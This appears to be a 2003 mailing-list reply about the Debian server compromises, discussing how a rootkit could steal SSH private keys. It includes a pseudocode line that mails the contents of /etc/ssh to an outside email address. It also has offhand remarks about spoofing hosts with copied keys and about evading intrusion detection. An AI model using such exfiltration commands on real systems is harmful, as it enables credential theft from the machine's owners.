keys - Re: Debian Investigation Report after Server Compromises

On Wed, 3 Dec 2003, Carl Fink wrote:

> If the system is rooted, it would be trivial to write a replacement
> for ssh (GPG, etc.) that copies your private keys onto the hard drive
> for later retrieval.  Definition of "trivial" is: I, a bad
> programmer, could do it.

why copy and get it later ??

why not have the rootkit you modified do the equivalent of:

    for each file...
	mail -s "hacked box" your-temp-addy@yahoo.com < /etc/ssh/*

- my understanding ... donno if it's right or not ..
	if i copy /etc/ssh/host_keys  to my laptop,
	when i log into debin host box ( example ) that host
	will think my latop is the debian dev box since i
	could be on my laptop with the same host keys

	- in which case, dont lose control of your host files
	or you're s.o.l.

	- i find it hard to believe its that simple ..
	( i havent tried it though .. to spoof another machine )

- i never did undestand why, people wanna run rootkits once they
  got in ... ( all it does is trip the various network/host ids )
	- leaving the fs intact, as it was, before you got in
	will go un-noticed ... but than again, you can't do much
	either .. but than gain, there are plenty of fun things
	one can do secretly.. w/o tripping the ids

- and the problem is if they are sniffing keystrokes... oh well..
  all bets are off for security .. there is none ..
	- even mouse clicks wont help

- best place to start..
	- assume they have root passwd ... now figure out how to
	cover yourself ( ie.. protect your data )

c ya
alvin